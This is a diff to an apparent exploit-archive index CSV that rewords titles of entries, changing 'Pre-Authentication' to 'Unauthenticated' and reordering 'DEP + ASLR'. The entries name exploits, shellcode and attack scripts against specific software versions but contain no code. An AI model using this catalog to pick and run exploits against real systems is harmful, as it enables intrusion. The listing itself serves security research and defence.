 16790,platforms/windows/dos/16790.rb,"PSO Proxy 0.91 - Stack Buffer Overflow",2010-05-09,Metasploit,windows,dos,8080
 16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow",2010-05-09,Metasploit,windows,remote,9999
 16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager - OvWebHelp.exe CGI Buffer Overflow",2010-11-11,Metasploit,windows,remote,0
@@ -14705,10 +14704,10 @@ id,file,description,date,author,platform,type,port
 16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution",2010-07-03,Metasploit,php,webapps,0
 16901,platforms/php/webapps/16901.rb,"PAJAX - Remote Command Execution",2010-04-30,Metasploit,php,webapps,0
 16902,platforms/php/webapps/16902.rb,"CakePHP 1.3.5 / 1.2.8 - Cache Corruption Exploit",2011-01-14,Metasploit,php,webapps,0
-16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php File Upload PHP Code Execution",2010-09-20,Metasploit,php,remote,0
+16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution",2010-09-20,Metasploit,php,remote,0
 16904,platforms/php/webapps/16904.rb,"Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion",2011-01-08,Metasploit,php,webapps,0
 16905,platforms/cgi/webapps/16905.rb,"AWStats (6.1-6.2) - configdir Remote Command Execution",2009-12-26,Metasploit,cgi,webapps,0
-16906,platforms/php/webapps/16906.rb,"Joomla 1.5.12 - tinybrowser File Upload Code Execution",2010-06-15,Metasploit,php,webapps,0
+16906,platforms/php/webapps/16906.rb,"Joomla 1.5.12 tinybrowser - Arbitrary File Upload / Code Execution",2010-06-15,Metasploit,php,webapps,0
 16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution",2010-07-01,Metasploit,hardware,webapps,0
 16908,platforms/cgi/webapps/16908.rb,"Nagios3 - statuswml.cgi Ping Command Execution",2010-07-14,Metasploit,cgi,webapps,0
 16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery 1.4.14 - picEditor.php Command Execution",2010-07-03,Metasploit,php,webapps,0
@@ -14761,7 +14760,7 @@ id,file,description,date,author,platform,type,port
 16957,platforms/windows/remote/16957.rb,"Oracle MySQL for Microsoft Windows - Payload Execution",2011-03-08,Metasploit,windows,remote,0
 16959,platforms/multiple/webapps/16959.txt,"Oracle WebLogic - Session Fixation Via HTTP POST",2011-03-11,"Roberto Suggi Liverani",multiple,webapps,0
 16960,platforms/linux/dos/16960.txt,"Linux NTP query client 4.2.6p1 - Heap Overflow",2011-03-11,mr_me,linux,dos,0
-16961,platforms/php/webapps/16961.py,"N_CMS 1.1E - Pre-Authentication Local File Inclusion / Remote Code Exploit",2011-03-11,TecR0c,php,webapps,0
+16961,platforms/php/webapps/16961.py,"N_CMS 1.1E - Unauthenticated Local File Inclusion / Remote Code Exploit",2011-03-11,TecR0c,php,webapps,0
 16962,platforms/asp/webapps/16962.txt,"SmarterStats 6.0 - Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",asp,webapps,0
 16963,platforms/php/webapps/16963.txt,"Constructr CMS 3.03 - MultipleRemote Vulnerabilities",2011-03-11,LiquidWorm,php,webapps,0
 16964,platforms/unix/remote/16964.rb,"Accellion File Transfer Appliance MPIPE2 - Command Execution",2011-03-11,Metasploit,unix,remote,8812
@@ -14779,7 +14778,7 @@ id,file,description,date,author,platform,type,port
 16977,platforms/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 - '.fcd' Buffer Overflow",2011-03-14,h1ch4m,windows,local,0
 16978,platforms/windows/local/16978.rb,"Foxit PDF Reader 4.2 - JavaScript File Write",2011-03-14,Metasploit,windows,local,0
 16979,platforms/windows/dos/16979.html,"Opera 11.01 - NULL PTR Dereference",2011-03-15,echo,windows,dos,0
-16980,platforms/php/webapps/16980.py,"If-CMS 2.07 - Pre-Authentication Local File Inclusion (1)",2011-03-15,TecR0c,php,webapps,0
+16980,platforms/php/webapps/16980.py,"If-CMS 2.07 - Unauthenticated Local File Inclusion (1)",2011-03-15,TecR0c,php,webapps,0
 16982,platforms/php/webapps/16982.txt,"lotuscms 3.0.3 - Multiple Vulnerabilities",2011-03-16,"High-Tech Bridge SA",php,webapps,0
 16984,platforms/windows/remote/16984.rb,"HP OpenView Performance Insight Server - Backdoor Account Code Execution",2011-03-15,Metasploit,windows,remote,0
 16985,platforms/multiple/remote/16985.rb,"Adobe ColdFusion - Directory Traversal (Metasploit)",2011-03-16,Metasploit,multiple,remote,0
@@ -14880,7 +14879,7 @@ id,file,description,date,author,platform,type,port
 17095,platforms/php/webapps/17095.html,"Allomani Audio and Video Library 2.7.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0
 17096,platforms/php/webapps/17096.html,"Allomani Super MultiMedia Library 2.5.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0
 17123,platforms/php/webapps/17123.txt,"Tutorialms 1.4 (show) - SQL Injection",2011-04-05,LiquidWorm,php,webapps,0
-17097,platforms/bsd/dos/17097.c,"IPComp - encapsulation Pre-Authentication kernel memory Corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0
+17097,platforms/bsd/dos/17097.c,"IPComp - encapsulation Unauthenticated kernel memory Corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0
 17098,platforms/php/webapps/17098.txt,"InTerra Blog Machine 1.84 - Cross-Site Scripting",2011-04-01,"High-Tech Bridge SA",php,webapps,0
 17099,platforms/php/webapps/17099.txt,"Feng Office 1.7.3.3 - Cross-Site Request Forgery",2011-04-01,"High-Tech Bridge SA",php,webapps,0
 17100,platforms/php/webapps/17100.txt,"spidaNews 1.0 - news.php 'id' SQL Injection",2011-04-02,"Easy Laster",php,webapps,0
@@ -14952,13 +14951,13 @@ id,file,description,date,author,platform,type,port
 17171,platforms/windows/local/17171.pl,"SimplyPlay 66 - '.pls' Buffer Overflow",2011-04-14,"C4SS!0 G0M3S",windows,local,0
 17172,platforms/php/webapps/17172.txt,"cPassMan 1.82 - Arbitrary File Download",2011-04-15,"Sense of Security",php,webapps,0
 17173,platforms/php/webapps/17173.txt,"TextAds 2.08 Script - Cross-Site Scripting",2011-04-15,"Ashiyane Digital Security Team",php,webapps,0
-17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger 2.8.33 - Post-Authentication Local File Inclusion / Edit",2011-04-15,bitform,multiple,webapps,0
+17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger 2.8.33 - Authenticated Local File Inclusion / Edit",2011-04-15,bitform,multiple,webapps,0
 17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 - SWF Memory Corruption",2011-04-16,Metasploit,windows,remote,0
 17176,platforms/asp/webapps/17176.txt,"SoftXMLCMS - Arbitrary File Upload",2011-04-16,Alexander,asp,webapps,0
 17177,platforms/windows/local/17177.rb,"Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)",2011-04-16,"Andrew King",windows,local,0
 17183,platforms/php/webapps/17183.txt,"osPHPSite - SQL Injection",2011-04-17,"vir0e5 ",php,webapps,0
 17188,platforms/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL - Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",windows,dos,0
-17187,platforms/windows/remote/17187.txt,"Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (DEP + ASLR Bypass)",2011-04-19,Abysssec,windows,remote,0
+17187,platforms/windows/remote/17187.txt,"Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (ASLR + DEP Bypass)",2011-04-19,Abysssec,windows,remote,0
 17185,platforms/windows/local/17185.py,"Wireshark 1.4.1-1.4.4 - SEH Overflow",2011-04-18,sickness,windows,local,0
 17186,platforms/windows/local/17186.rb,"Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (1)",2011-04-19,Metasploit,windows,local,0
 17197,platforms/php/webapps/17197.txt,"First Escort Marketing CMS - Multiple SQL Injections Vulnerabilities",2011-04-22,NoNameMT,php,webapps,0
@@ -15087,7 +15086,7 @@ id,file,description,date,author,platform,type,port
 17351,platforms/hardware/dos/17351.py,"iPhone4 FTP Server 1.0 - Empty CWD-RETR Remote Crash",2011-05-31,offsetIntruder,hardware,dos,0
 17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 - Data Server/Collector Packet Handling Vulnerabilities",2011-05-30,Metasploit,windows,remote,0
 17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW - series Authentication Bypass printer flooder",2011-05-31,chrisB,hardware,dos,0
-17354,platforms/windows/remote/17354.py,"Easy Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow",2011-06-01,b33f,windows,remote,0
+17354,platforms/windows/remote/17354.py,"Easy Ftp Server 1.7.0.2 - Authenticated Buffer Overflow",2011-06-01,b33f,windows,remote,0
 17355,platforms/windows/remote/17355.rb,"Golden FTP 4.70 - PASS Stack Buffer Overflow",2011-06-02,Metasploit,windows,remote,21
 17356,platforms/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",hardware,remote,0
 18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0
@@ -15101,7 +15100,7 @@ id,file,description,date,author,platform,type,port
 17366,platforms/windows/remote/17366.rb,"Cisco AnyConnect VPN Client - ActiveX URL Property Download and Execute",2011-06-06,Metasploit,windows,remote,0
 17367,platforms/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0
 17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0
-17373,platforms/windows/remote/17373.py,"ActFax Server FTP - (Post-Authentication) Remote Buffer Overflow",2011-06-08,b33f,windows,remote,0
+17373,platforms/windows/remote/17373.py,"ActFax Server FTP - (Authenticated) Remote Buffer Overflow",2011-06-08,b33f,windows,remote,0
 17372,platforms/windows/dos/17372.txt,"VLC Media Player - XSPF Local File Integer Overflow in XSPF Playlist parser",2011-06-08,TecR0c,windows,dos,0
 17374,platforms/windows/remote/17374.rb,"7-Technologies IGSS 9 - IGSSdataServer .Rms Rename Buffer Overflow",2011-06-09,Metasploit,windows,remote,0
 17375,platforms/asp/webapps/17375.txt,"EquiPCS - SQL Injection",2011-06-09,Sideswipe,asp,webapps,0
@@ -15144,7 +15143,7 @@ id,file,description,date,author,platform,type,port
 17415,platforms/windows/remote/17415.rb,"Black Ice Cover Page SDK - insecure method DownloadImageFileURL() Exploit (Metasploit)",2011-06-20,mr_me,windows,remote,0
 17416,platforms/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution",2011-06-20,mr_me,windows,remote,0
 17417,platforms/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 - On_FC_CONNECT_FCS_a_FILE Buffer Overflow",2011-06-20,Metasploit,windows,remote,0
-17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 - Pre-Authentication Local File Inclusion (Metasploit) (2)",2011-06-20,TecR0c,php,webapps,0
+17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 - Unauthenticated Local File Inclusion (Metasploit) (2)",2011-06-20,TecR0c,php,webapps,0
 17419,platforms/windows/remote/17419.zip,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer (2)",2011-06-20,Abysssec,windows,remote,0
 17421,platforms/windows/dos/17421.py,"XnView 1.98 - Denial of Service (PoC)",2011-06-20,BraniX,windows,dos,0
 17422,platforms/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download",2011-06-21,ShellVision,hardware,remote,0
@@ -15423,7 +15422,7 @@ id,file,description,date,author,platform,type,port
 17751,platforms/php/webapps/17751.txt,"WordPress Event Registration plugin 5.4.3 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0
 17752,platforms/php/webapps/17752.txt,"vAuthenticate 3.0.1 - Authentication Bypass",2011-08-30,bd0rk,php,webapps,0
 17753,platforms/php/webapps/17753.txt,"FileBox - File Hosting & Sharing Script 1.5 - SQL Injection",2011-08-30,SubhashDasyam,php,webapps,0
-17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP + ASLR Bypass)",2011-08-30,sickness,windows,local,0
+17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit (ASLR + DEP Bypass)",2011-08-30,sickness,windows,local,0
 17755,platforms/php/webapps/17755.txt,"WordPress Crawl Rate Tracker plugin 2.0.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0
 17756,platforms/php/webapps/17756.txt,"WordPress Plugin audio Gallery Playlist 0.12 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0
 17757,platforms/php/webapps/17757.txt,"WordPress yolink Search plugin 1.1.4 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0
@@ -15465,7 +15464,7 @@ id,file,description,date,author,platform,type,port
 17798,platforms/php/webapps/17798.txt,"WordPress Community Events plugin 1.2.1 - SQL Injection",2011-09-08,"Miroslav Stampar",php,webapps,0
 17800,platforms/php/webapps/17800.txt,"AM4SS 1.2 - Cross-Site Request Forgery (add admin)",2011-09-08,"red virus",php,webapps,0
 17801,platforms/php/webapps/17801.rb,"WordPress 1 Flash Gallery 1.30 < 1.5.7a Plugin - Arbitrary File Upload (Metasploit)",2011-09-08,"Ben Schmidt",php,webapps,0
-17803,platforms/windows/local/17803.php,"DVD X Player 5.5 Pro - (SEH DEP + ASLR Bypass) Exploit",2011-09-08,Rew,windows,local,0
+17803,platforms/windows/local/17803.php,"DVD X Player 5.5 Pro - (SEH + ASLR + DEP Bypass) Exploit",2011-09-08,Rew,windows,local,0
 21788,platforms/windows/dos/21788.pl,"FastStone Image Viewer 4.6 - ReadAVonIP Crash (PoC)",2012-10-07,"Jean Pascal Pereira",windows,dos,0
 21787,platforms/php/webapps/21787.rb,"MyAuth3 - Blind SQL Injection",2012-10-07,"Marcio Almeida",php,webapps,0
 17806,platforms/linux/dos/17806.txt,"FTP Client (Ubuntu 11.04) - Local Buffer Overflow Crash (PoC)",2011-09-08,localh0t,linux,dos,0
@@ -15479,7 +15478,7 @@ id,file,description,date,author,platform,type,port
 17815,platforms/windows/dos/17815.py,"MelOn Player 1.0.11.x - Denial of Service (PoC)",2011-09-09,modpr0be,windows,dos,0
 17816,platforms/php/webapps/17816.txt,"WordPress Tune Library plugin 2.17 - SQL Injection",2011-09-10,"Miroslav Stampar",php,webapps,0
 17817,platforms/windows/local/17817.php,"ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Buffer Overflow",2011-09-12,mr_me,windows,local,0
-17818,platforms/php/webapps/17818.txt,"TomatoCart 1.1 - Post-Authentication Local File Inclusion",2011-09-12,brain[pillow],php,webapps,0
+17818,platforms/php/webapps/17818.txt,"TomatoCart 1.1 - Authenticated Local File Inclusion",2011-09-12,brain[pillow],php,webapps,0
 17819,platforms/windows/remote/17819.py,"KnFTP Server - Buffer Overflow",2011-09-12,blake,windows,remote,0
 17820,platforms/windows/local/17820.c,"Aika 0.2 - colladaconverter Xml Parsing Buffer Overflow",2011-09-12,isciurus,windows,local,0
 17821,platforms/windows/local/17821.py,"Wav Player 1.1.3.6 - '.pll' Buffer Overflow",2011-09-12,"Iván García Ferreira",windows,local,0
@@ -15585,7 +15584,7 @@ id,file,description,date,author,platform,type,port
 17936,platforms/windows/remote/17936.rb,"Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0
 17937,platforms/php/webapps/17937.txt,"URL Shortener Script 1.0 - SQL Injection",2011-10-07,M.Jock3R,php,webapps,0
 17938,platforms/php/webapps/17938.txt,"EFront 3.6.9 Community Edition - Multiple Vulnerabilities",2011-10-07,IHTeam,php,webapps,0
-17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal DEP + ASLR Bypass",2011-10-07,modpr0be,windows,local,0
+17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass",2011-10-07,modpr0be,windows,local,0
 17940,platforms/linux_mips/shellcode/17940.c,"Linux/MIPS - execve Shellcode (52 bytes)",2011-10-07,entropy,linux_mips,shellcode,0
 17941,platforms/linux/webapps/17941.rb,"Spreecommerce 0.60.1 - Arbitrary Command Execution",2011-10-07,Metasploit,linux,webapps,0
 17942,platforms/linux/local/17942.c,"pkexec - Race Condition Privilege Escalation",2011-10-08,xi4oyu,linux,local,0
@@ -15742,7 +15741,7 @@ id,file,description,date,author,platform,type,port
 18115,platforms/php/webapps/18115.txt,"Pixie CMS 1.01 < 1.04 - Blind SQL Injections",2011-11-14,Piranha,php,webapps,0
 18116,platforms/multiple/dos/18116.html,"Firefox 8.0 - Null Pointer Dereference (PoC)",2011-11-14,0in,multiple,dos,0
 18117,platforms/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Time-Based SQL Injection",2011-11-15,"Jose Carlos de Arriba",multiple,webapps,0
-18118,platforms/php/webapps/18118.txt,"QuiXplorer 2.3 - Bugtraq File Upload",2011-11-15,PCA,php,webapps,0
+18118,platforms/php/webapps/18118.txt,"QuiXplorer 2.3 - Bugtraq Arbitrary File Upload",2011-11-15,PCA,php,webapps,0
 18121,platforms/php/webapps/18121.txt,"FreeWebShop 2.2.9 R2 - (ajax_save_name.php) Remote Code Execution",2011-11-16,EgiX,php,webapps,0
 18122,platforms/hardware/webapps/18122.txt,"SonicWALL Aventail SSL-VPN - SQL Injection",2011-11-16,"Asheesh kumar",hardware,webapps,0
 18123,platforms/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control",2011-11-17,Metasploit,windows,remote,0
@@ -15754,7 +15753,7 @@ id,file,description,date,author,platform,type,port
 18129,platforms/php/webapps/18129.txt,"Blogs manager 1.101 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0
 18131,platforms/php/webapps/18131.txt,"ARASTAR - SQL Injection",2011-11-19,TH3_N3RD,php,webapps,0
 18134,platforms/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Exploit",2011-11-20,Metasploit,windows,remote,0
-18137,platforms/win_x86/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR Bypass (Metasploit)",2011-11-21,hellok,win_x86,local,0
+18137,platforms/win_x86/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows (ASLR + DEP Bypass) (Metasploit)",2011-11-21,hellok,win_x86,local,0
 18138,platforms/windows/remote/18138.txt,"VMware - Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote,0
 18140,platforms/windows/dos/18140.c,"Winows 7 keylayout - Blue Screen",2011-11-21,instruder,windows,dos,0
 18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - '.wav' Stack Buffer Overflow",2011-11-22,Metasploit,windows,local,0
@@ -15949,7 +15948,7 @@ id,file,description,date,author,platform,type,port
 18394,platforms/asp/webapps/18394.txt,"ICTimeAttendance - Authentication Bypass",2012-01-20,v3n0m,asp,webapps,0
 18395,platforms/asp/webapps/18395.txt,"EasyPage - SQL Injection",2012-01-20,"Red Security TEAM",asp,webapps,0
 18396,platforms/php/webapps/18396.sh,"WhatsApp Status Changer 0.2 - Exploit",2012-01-20,emgent,php,webapps,0
-18397,platforms/windows/remote/18397.py,"Avaya WinPDM UniteHostRouter 3.8.2 - Remote Pre-Authentication Command Execution",2012-01-20,Abysssec,windows,remote,0
+18397,platforms/windows/remote/18397.py,"Avaya WinPDM UniteHostRouter 3.8.2 - Remote Unauthenticated Command Execution",2012-01-20,Abysssec,windows,remote,0
 18401,platforms/windows/remote/18401.py,"Savant Web Server 3.1 - Buffer Overflow (Egghunter)",2012-01-21,red-dragon,windows,remote,0
 18402,platforms/php/webapps/18402.pl,"PHP iReport 1.0 - Remote Html Code Injection",2012-01-21,Or4nG.M4N,php,webapps,0
 18403,platforms/php/webapps/18403.txt,"Nova CMS - Directory Traversal",2012-01-21,"Red Security TEAM",php,webapps,0
@@ -16064,8 +16063,8 @@ id,file,description,date,author,platform,type,port
 18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - '.pls' Stack Buffer Overflow",2012-03-02,Metasploit,windows,local,0
 18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0
 18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow",2012-02-27,Vulnerability-Lab,windows,local,0
-18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Post-Authentication SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0
-18535,platforms/windows/remote/18535.py,"Sysax 5.53 - SSH 'Username' Buffer Overflow Pre-Authentication Remote Code Execution (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0
+18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Authenticated SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0
+18535,platforms/windows/remote/18535.py,"Sysax 5.53 - SSH 'Username' Buffer Overflow Unauthenticated Remote Code Execution (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0
 18536,platforms/php/webapps/18536.txt,"WebfolioCMS 1.1.4 - Cross-Site Request Forgery (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",php,webapps,0
 18702,platforms/php/webapps/18702.txt,"Hotel Booking Portal - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0
 18538,platforms/windows/remote/18538.rb,"ASUS Net4Switch - ipswcom.dll ActiveX Stack Buffer Overflow",2012-02-29,Metasploit,windows,remote,0
@@ -16196,7 +16195,7 @@ id,file,description,date,author,platform,type,port
 18690,platforms/php/webapps/18690.txt,"BuddyPress plugin of WordPress - SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0
 18691,platforms/windows/dos/18691.rb,"FoxPlayer 2.6.0 - Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",windows,dos,0
 18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - '.aiff' Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0
-18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH & DEP & ASLR",2012-04-03,b33f,windows,local,0
+18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH + ASLR + DEP Bypass",2012-04-03,b33f,windows,local,0
 18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda 2.2.8 - Cross-Site Request Forgery (Add Admin / Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0
 18708,platforms/php/webapps/18708.txt,"GENU CMS - SQL Injection",2012-04-05,"hordcode security",php,webapps,0
 18709,platforms/windows/remote/18709.rb,"TRENDnet SecurView Internet Camera - UltraMJCam OpenFileDlg Buffer Overflow",2012-04-06,Metasploit,windows,remote,0
@@ -16210,7 +16209,7 @@ id,file,description,date,author,platform,type,port
 18771,platforms/windows/dos/18771.txt,"SumatraPDF 2.0.1 - '.chm' / '.mobi' Memory Corruption",2012-04-23,shinnai,windows,dos,0
 18722,platforms/cgi/webapps/18722.txt,"ZTE - Change Admin Password",2012-04-08,"Nuevo Asesino",cgi,webapps,0
 18723,platforms/multiple/remote/18723.rb,"Snort 2 - DCE/RPC Preprocessor Buffer Overflow",2012-04-09,Metasploit,multiple,remote,0
-18724,platforms/php/webapps/18724.rb,"Dolibarr ERP & CRM 3 - Post-Authentication OS Command Injection",2012-04-09,Metasploit,php,webapps,0
+18724,platforms/php/webapps/18724.rb,"Dolibarr ERP & CRM 3 - Authenticated OS Command Injection",2012-04-09,Metasploit,php,webapps,0
 18725,platforms/php/webapps/18725.txt,"Dolibarr ERP & CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",php,webapps,0
 18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0
 18727,platforms/windows/remote/18727.rb,"IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 - ActiveX RunAndUploadFile() Method Overflow",2012-04-10,Metasploit,windows,remote,0
@@ -16222,7 +16221,7 @@ id,file,description,date,author,platform,type,port
 18735,platforms/windows/remote/18735.rb,"Quest InTrust Annotation Objects - Uninitialized Pointer",2012-04-13,Metasploit,windows,remote,0
 18736,platforms/php/webapps/18736.txt,"Invision Power Board 3.3.0 - Local File Inclusion",2012-04-13,waraxe,php,webapps,0
 18737,platforms/php/webapps/18737.txt,"Ushahidi 2.2 - Multiple Vulnerabilities",2012-04-13,shpendk,php,webapps,0
-18738,platforms/php/remote/18738.rb,"V-CMS - PHP File Upload and Execution",2012-04-14,Metasploit,php,remote,0
+18738,platforms/php/remote/18738.rb,"V-CMS - Arbitrary .PHP File Upload / Execution",2012-04-14,Metasploit,php,remote,0
 18739,platforms/windows/dos/18739.txt,"Irfanview FlashPix PlugIn - Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0
 18749,platforms/osx/local/18749.py,"Office 2008 sp0 - RTF pFragments MAC Exploit",2012-04-18,"Abhishek Lyall",osx,local,0
 18741,platforms/php/webapps/18741.txt,"joomla Component (com_ponygallery) - SQL Injection",2012-04-15,xDarkSton3x,php,webapps,0
@@ -16264,7 +16263,7 @@ id,file,description,date,author,platform,type,port
 18788,platforms/php/webapps/18788.txt,"PHP Volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0
 18785,platforms/linux/local/18785.txt,"Parallels PLESK 9.x - Insecure Permissions",2012-04-26,"Nicolas Krassas",linux,local,0
 18787,platforms/php/webapps/18787.txt,"WordPress Zingiri Web Shop Plugin 2.4.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps,0
-18797,platforms/linux/webapps/18797.rb,"WebCalendar 1.2.4 - Pre-Authentication Remote Code Injection",2012-04-29,Metasploit,linux,webapps,0
+18797,platforms/linux/webapps/18797.rb,"WebCalendar 1.2.4 - Unauthenticated Remote Code Injection",2012-04-29,Metasploit,linux,webapps,0
 18798,platforms/php/webapps/18798.txt,"Soco CMS - Local File Inclusion",2012-04-29,"BHG Security Center",php,webapps,0
 18799,platforms/windows/dos/18799.py,"Remote-Anything Player 5.60.15 - Denial of Service",2012-04-29,"Saint Patrick",windows,dos,0
 18791,platforms/php/webapps/18791.txt,"WordPress 3.3.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-04-27,"Ivano Binetti",php,webapps,0
@@ -16359,7 +16358,7 @@ id,file,description,date,author,platform,type,port
 18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation",2012-05-22,sickness,windows,local,0
 18908,platforms/php/webapps/18908.txt,"Vanilla Forums LatestComment 1.1 Plugin - Persistent Cross-Site Scripting",2012-05-18,"Henry Hoggard",php,webapps,0
 18915,platforms/windows/remote/18915.rb,"FlexNet License Server Manager - lmgrd Buffer Overflow",2012-05-23,Metasploit,windows,remote,0
-18922,platforms/php/webapps/18922.rb,"appRain CMF - Arbitrary PHP File Upload",2012-05-25,Metasploit,php,webapps,0
+18922,platforms/php/webapps/18922.rb,"appRain CMF - Arbitrary .PHP File Upload",2012-05-25,Metasploit,php,webapps,0
 18916,platforms/windows/dos/18916.txt,"Symantec End Point Protection 11.x - & Symantec Network Access Control 11.x - LCE (PoC)",2012-05-23,41.w4r10r,windows,dos,0
 18917,platforms/linux/local/18917.txt,"Apache - Mod_Auth_OpenID Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0
 18918,platforms/multiple/dos/18918.txt,"Wireshark - DIAMETER Dissector Denial of Service",2012-05-24,Wireshark,multiple,dos,0
@@ -17378,7 +17377,7 @@ id,file,description,date,author,platform,type,port
 20026,platforms/linux/dos/20026.c,"OpenLinux 2.3/2.4 / RedHat 6.0/6.1 / SCO eServer 2.3 - Denial of Service",1999-11-23,FuckGpm,linux,dos,0
 20027,platforms/multiple/remote/20027.txt,"BEA Systems WebLogic Express 3.1.8/4/5 - Source Code Disclosure",2000-06-21,"Foundstone Inc.",multiple,remote,0
 20028,platforms/windows/remote/20028.rb,"Simple Web Server - Connection Header Buffer Overflow",2012-07-23,Metasploit,windows,remote,0
-20029,platforms/php/webapps/20029.rb,"EGallery - PHP File Upload",2012-07-23,Metasploit,php,webapps,0
+20029,platforms/php/webapps/20029.rb,"EGallery - Arbitrary .PHP File Upload",2012-07-23,Metasploit,php,webapps,0
 20030,platforms/unix/remote/20030.c,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (1)",1999-10-15,tf8,unix,remote,0
 20031,platforms/linux/remote/20031.c,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (2)",2000-09-26,vsz_,linux,remote,0
 20032,platforms/lin_x86/remote/20032.txt,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3)",2001-05-04,justme,lin_x86,remote,0
@@ -17410,7 +17409,7 @@ id,file,description,date,author,platform,type,port
 20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - '/INVITE' Format String",2000-07-05,RaiSe,linux,remote,0
